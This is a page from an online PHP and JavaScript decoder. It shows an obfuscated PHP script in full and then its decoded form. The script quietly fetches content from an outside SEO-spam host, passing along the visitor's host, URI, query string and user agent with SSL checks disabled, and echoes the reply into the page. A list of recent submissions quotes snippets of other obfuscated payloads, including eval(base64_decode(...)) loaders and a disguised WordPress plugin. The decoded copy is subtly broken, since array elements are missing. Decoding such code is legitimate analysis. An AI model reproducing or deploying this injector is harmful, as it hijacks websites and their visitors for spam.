Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

require_once('config.php');
   GoTO p5om_; i2576: $PzX_R = isset($_SERVER["\110\x54\124\x50\137\x48\x4f\x53\x54"]) ? urldecode($_SERVER["\x48\124\x54\120\x5f\110\117\123\124"]) : ''; GoTO s4WMf; EYnNu: if (empty($nON_U)) { GoTO z9L9A; } GoTO X6OGH; tW7WR: @date_default_timezone_set("\101\163\x69\141\x2f\x48\157\x5f\x43\x68\151\137\115\x69\x6e\x68"); GoTO dMHbP; RV2RS: yjSSx: GoTO MLB0M; uO2B8: $ZIZAk = $EWrso . "\x7a\x68\x69\x7a\150\165\x2e\160\150\160"; GoTO hOxE5; Xaf_x: $KMSIB = isset($_SERVER["\x52\105\121\x55\x45\x53\124\137\125\x52\111"]) ? urlencode($_SERVER["\x52\105\121\x55\x45\123\124\x5f\x55\x52\x49"]) : ''; GoTO braP8; G_T7P: @header("\103\157\x6e\x74\145\156\x74\55\124\x79\x70\145\72\40\164\145\x78\x74\57\x68\164\x6d\154\73\143\150\x61\x72\163\145\x74\75\x75\x74\x66\x2d\70"); GoTO tW7WR; KHu4C: $xZ4Mc = ["\x68", "\164", "\164", "\160", "\72", "\x2f", "\57", "\163", "\x65", "\157", "\56", "\x7a", "\x68", "\165", "\171", "\x65", "\x32", "\x34", "\150", "\56", "\x63", "\157", "\x6d", "\x2f"]; GoTO hzDuh; ipftB: iwy2y: GoTO XdWlR; braP8: $nON_U = isset($_SERVER["\121\125\105\122\131\137\x53\x54\122\x49\x4e\x47"]) ? $_SERVER["\121\125\105\122\131\137\x53\x54\122\x49\x4e\107"] : ''; GoTO CPzPN; XdWlR: echo $cp0JY; GoTO nROzZ; leBHh: $KAKEl = preg_match($knBXN, isset($_SERVER["\122\x45\x51\x55\105\123\x54\137\x55\122\111"]) ? $_SERVER["\x52\x45\121\x55\x45\123\x54\x5f\x55\x52\x49"] : ''); GoTO i2576; OFzcl: $ad4qs = !empty($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\x48\124\x54\x50\123"] !== "\157\x66\146" ? "\x68\164\x74\x70\163\x3a\x2f\x2f" : "\150\164\x74\x70\72\57\57"; GoTO P19SG; G50L6: exit; GoTO JAhuF; tPVzT: if ($KAKEl) { GoTO b_5yI; } GoTO B1Duj; RRFvh: if (empty($nON_U)) { GoTO yjSSx; } GoTO kHtLf; PGcRp: if (!preg_match("\x2f\134\x2e\141\155\x70\44\57\x69", isset($_SERVER["\x52\x45\x51\125\x45\x53\124\x5f\x55\122\111"]) ? $_SERVER["\x52\x45\x51\125\105\123\x54\137\125\122\x49"] : '')) { GoTO BSHJj; } GoTO OFzcl; CPzPN: $vF8eH = $EWrso . "\x61\155\x70\56\160\150\x70\77\144\75" . $ad4qs . $PzX_R . "\x26\160\x3d" . $KMSIB; GoTO RRFvh; R2Ltp: $knBXN = "\x2f\x5c\x2e\x28\170\155\x6c\174\x78\150\164\x6d\x6c\x7c\x68\164\x6d\174\163\x68\164\155\154\x7c\x70\x64\x66\174\x6a\163\160\x7c\144\x6f\x63\x7c\x61\155\160\x29\44\x2f\151"; GoTO leBHh; hzDuh: $EWrso = implode('', $xZ4Mc); GoTO PGcRp; kHtLf: $vF8eH .= "\x26" . $nON_U; GoTO RV2RS; s4WMf: $KMSIB = isset($_SERVER["\122\x45\x51\125\x45\x53\124\137\125\x52\x49"]) ? $_SERVER["\x52\x45\x51\x55\105\123\124\137\x55\122\x49"] : ''; GoTO AKQfc; B1Duj: $cp0JY = CzANo($ZIZAk, $R2J17); GoTO ObjVU; KtMnd: $vF8eH = $EWrso . "\x3f\x64\75" . $ad4qs . $PzX_R . "\x26\x70\75" . urlencode($KMSIB); GoTO EYnNu; hOxE5: $ad4qs = !empty($_SERVER["\110\x54\124\x50\x53"]) && $_SERVER["\110\124\x54\x50\123"] !== "\x6f\146\146" ? "\150\x74\x74\160\163\72\57\57" : "\150\x74\x74\x70\72\57\57"; GoTO tPVzT; X6OGH: $vF8eH .= "\x26" . $nON_U; GoTO ohItz; MLB0M: echo CzaNo($vF8eH, $R2J17); GoTO G50L6; ObjVU: GoTO iwy2y; GoTO uq1Uw; ANARy: $cp0JY = CzAno($vF8eH, $R2J17); GoTO ipftB; ohItz: z9L9A: GoTO ANARy; AKQfc: $nON_U = isset($_SERVER["\121\125\105\122\131\137\x53\124\x52\111\x4e\x47"]) ? $_SERVER["\121\125\105\122\x59\137\123\124\x52\111\116\x47"] : ''; GoTO uO2B8; p5om_: @set_time_limit(0); GoTO G_T7P; JAhuF: BSHJj: GoTO R2Ltp; P19SG: $PzX_R = isset($_SERVER["\110\x54\124\x50\137\110\x4f\x53\x54"]) ? urldecode($_SERVER["\x48\124\x54\120\x5f\x48\x4f\x53\124"]) : ''; GoTO Xaf_x; uq1Uw: b_5yI: GoTO KtMnd; dMHbP: $R2J17 = isset($_SERVER["\x48\124\124\x50\x5f\125\123\x45\x52\137\x41\x47\x45\116\x54"]) ? $_SERVER["\110\x54\x54\x50\137\125\x53\x45\x52\137\101\x47\x45\x4e\124"] : ''; GoTO KHu4C; nROzZ: function CzANo($vF8eH, $R2J17 = '') { GoTO h4hXQ; Tzb3_: curl_setopt($l1y5k, CURLOPT_FOLLOWLOCATION, true); GoTO mXjsU; EEIjG: $l1y5k = curl_init(); GoTO CTAFe; ZCZvp: VdkkK: GoTO yNauN; yNauN: $fD_dw = curl_exec($l1y5k); GoTO qRIhP; GyUNb: curl_setopt($l1y5k, CURLOPT_SSL_VERIFYHOST, 0); GoTO CVn_8; sUsod: curl_setopt($l1y5k, CURLOPT_USERAGENT, $R2J17); GoTO ZCZvp; CTAFe: curl_setopt($l1y5k, CURLOPT_URL, $vF8eH); GoTO LWvFN; h4hXQ: if (!function_exists("\x63\165\162\x6c\137\151\x6e\x69\164")) { GoTO NNVYt; NNVYt: $iv0Sk = "\146\x69\x6c\x65" . "\x5f\147\x65\164" . "\x5f\143\157\x6e\x74\x65\x6e\x74\163"; GoTO TS0Hm; bN0a0: $GSCpm = $vF8eH; GoTO XOgIK; TS0Hm: $sCoJq = array("\x68\x74\x74\x70" => array("\x6d\x65\164\150\157\144" => "\x47\x45\x54", "\x68\x65\141\x64\x65\x72" => "\x55\x73\145\162\55\x41\x67\x65\x6e\164\72\40" . $R2J17 . "\15\12")); GoTO SZBwQ; rmS0m: return @$iv0Sk($GSCpm, $cTE4F, $Zg_4e); GoTO vEKj1; ZS7_q: $Zg_4e = $R22a8; GoTO rmS0m; XOgIK: $cTE4F = false; GoTO ZS7_q; SZBwQ: $R22a8 = stream_context_create($sCoJq); GoTO bN0a0; vEKj1: } GoTO EEIjG; CVn_8: if (empty($R2J17)) { GoTO VdkkK; } GoTO sUsod; LWvFN: curl_setopt($l1y5k, CURLOPT_RETURNTRANSFER, true); GoTO Tzb3_; PsXm0: curl_setopt($l1y5k, CURLOPT_SSL_VERIFYPEER, false); GoTO GyUNb; mXjsU: curl_setopt($l1y5k, CURLOPT_TIMEOUT, 20); GoTO PsXm0; qRIhP: curl_close($l1y5k); GoTO UWp5a; UWp5a: return $fD_dw; GoTO owTku; owTku: }

Decrypted code:

require_once('config.php');
   GoTO p5om_; i2576: $PzX_R = isset($_SERVER["HTTP_HOST"]) ? urldecode($_SERVER["HTTP_HOST"]) : ''; GoTO s4WMf; EYnNu: if (empty($nON_U)) { GoTO z9L9A; } GoTO X6OGH; tW7WR: @date_default_timezone_set("Asia/Ho_Chi_Minh"); GoTO dMHbP; RV2RS: yjSSx: GoTO MLB0M; uO2B8: $ZIZAk = $EWrso . "zhizhu.php"; GoTO hOxE5; Xaf_x: $KMSIB = isset($_SERVER["REQUEST_URI"]) ? urlencode($_SERVER["REQUEST_URI"]) : ''; GoTO braP8; G_T7P: @header("Content-Type: text/html;charset=utf-8"); GoTO tW7WR; KHu4C: $xZ4Mc = ["h", "t", "t", "p", ":", "/", "/", "s", "e", "o", , "z", "h", "u", "y", "e", "2", "4", "h", , "c", "o", "m", "/"]; GoTO hzDuh; ipftB: iwy2y: GoTO XdWlR; braP8: $nON_U = isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : ''; GoTO CPzPN; XdWlR: echo $cp0JY; GoTO nROzZ; leBHh: $KAKEl = preg_match($knBXN, isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : ''); GoTO i2576; OFzcl: $ad4qs = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; GoTO P19SG; G50L6: exit; GoTO JAhuF; tPVzT: if ($KAKEl) { GoTO b_5yI; } GoTO B1Duj; RRFvh: if (empty($nON_U)) { GoTO yjSSx; } GoTO kHtLf; PGcRp: if (!preg_match("/\.amp$/i", isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : '')) { GoTO BSHJj; } GoTO OFzcl; CPzPN: $vF8eH = $EWrso . "amp.php?d=" . $ad4qs . $PzX_R . "&p=" . $KMSIB; GoTO RRFvh; R2Ltp: $knBXN = "/\.(xml|xhtml|htm|shtml|pdf|jsp|doc|amp)$/i"; GoTO leBHh; hzDuh: $EWrso = implode('', $xZ4Mc); GoTO PGcRp; kHtLf: $vF8eH .= "&" . $nON_U; GoTO RV2RS; s4WMf: $KMSIB = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : ''; GoTO AKQfc; B1Duj: $cp0JY = CzANo($ZIZAk, $R2J17); GoTO ObjVU; KtMnd: $vF8eH = $EWrso . "?d=" . $ad4qs . $PzX_R . "&p=" . urlencode($KMSIB); GoTO EYnNu; hOxE5: $ad4qs = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; GoTO tPVzT; X6OGH: $vF8eH .= "&" . $nON_U; GoTO ohItz; MLB0M: echo CzaNo($vF8eH, $R2J17); GoTO G50L6; ObjVU: GoTO iwy2y; GoTO uq1Uw; ANARy: $cp0JY = CzAno($vF8eH, $R2J17); GoTO ipftB; ohItz: z9L9A: GoTO ANARy; AKQfc: $nON_U = isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : ''; GoTO uO2B8; p5om_: @set_time_limit(0); GoTO G_T7P; JAhuF: BSHJj: GoTO R2Ltp; P19SG: $PzX_R = isset($_SERVER["HTTP_HOST"]) ? urldecode($_SERVER["HTTP_HOST"]) : ''; GoTO Xaf_x; uq1Uw: b_5yI: GoTO KtMnd; dMHbP: $R2J17 = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; GoTO KHu4C; nROzZ: function CzANo($vF8eH, $R2J17 = '') { GoTO h4hXQ; Tzb3_: curl_setopt($l1y5k, CURLOPT_FOLLOWLOCATION, true); GoTO mXjsU; EEIjG: $l1y5k = curl_init(); GoTO CTAFe; ZCZvp: VdkkK: GoTO yNauN; yNauN: $fD_dw = curl_exec($l1y5k); GoTO qRIhP; GyUNb: curl_setopt($l1y5k, CURLOPT_SSL_VERIFYHOST, 0); GoTO CVn_8; sUsod: curl_setopt($l1y5k, CURLOPT_USERAGENT, $R2J17); GoTO ZCZvp; CTAFe: curl_setopt($l1y5k, CURLOPT_URL, $vF8eH); GoTO LWvFN; h4hXQ: if (!function_exists("curl_init")) { GoTO NNVYt; NNVYt: $iv0Sk = "file_get_contents"; GoTO TS0Hm; bN0a0: $GSCpm = $vF8eH; GoTO XOgIK; TS0Hm: $sCoJq = array("http" => array("method" => "GET", "header" => "User-Agent: " . $R2J17 . "
")); GoTO SZBwQ; rmS0m: return @$iv0Sk($GSCpm, $cTE4F, $Zg_4e); GoTO vEKj1; ZS7_q: $Zg_4e = $R22a8; GoTO rmS0m; XOgIK: $cTE4F = false; GoTO ZS7_q; SZBwQ: $R22a8 = stream_context_create($sCoJq); GoTO bN0a0; vEKj1: } GoTO EEIjG; CVn_8: if (empty($R2J17)) { GoTO VdkkK; } GoTO sUsod; LWvFN: curl_setopt($l1y5k, CURLOPT_RETURNTRANSFER, true); GoTO Tzb3_; PsXm0: curl_setopt($l1y5k, CURLOPT_SSL_VERIFYPEER, false); GoTO GyUNb; mXjsU: curl_setopt($l1y5k, CURLOPT_TIMEOUT, 20); GoTO PsXm0; qRIhP: curl_close($l1y5k); GoTO UWp5a; UWp5a: return $fD_dw; GoTO owTku; owTku: }

Recent submissions:

<?php /** * Plugin Name: Performance Guard * Plugin URI: https://github.com/techcraft... document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%2... <?php /* __________________________________________________ | Obfuscated by YAK P... //NC4w $_CNFTEZD=__FILE__;$_WYLZRMGF=__LINE__;$_HUTOTSZZNFF=__DIR__ ;$_FNEWHFV=__FU... //NC4w $_CNFTEZD=__FILE__;$_WYLZRMGF=__LINE__;$_HUTOTSZZNFF=__DIR__ ;$_FNEWHFV=__... function b(c,d){var e=a();return b=function(f,g){f=f-0x117;var h=e[f];return h;},b(c,d);}f... Function("KVM0oVs","var yh_6NfX,vYB2oB2,A6V_5Nw,xyY4Xho,KNYS_4,zmiIFdN,piqEjD,e6ErHx,HAkin... <?php goto cyYBx; vSxzK: if ($now <= $autoGetCountDeadline) { die; } goto NXx2l; sLbhQ: ... <?php eval(gzuncompress(base64_decode(str_rot13('rWjIzZpBd1bJEQ/a3ELQxxyd9LPpGL6GW3YBzn9i... eval(gzuncompress(base64_decode(str_rot13('rWjIzZpBd1bJEQ/a3ELQxxyd9LPpGL6GW3YBzn9iK2nJRZu...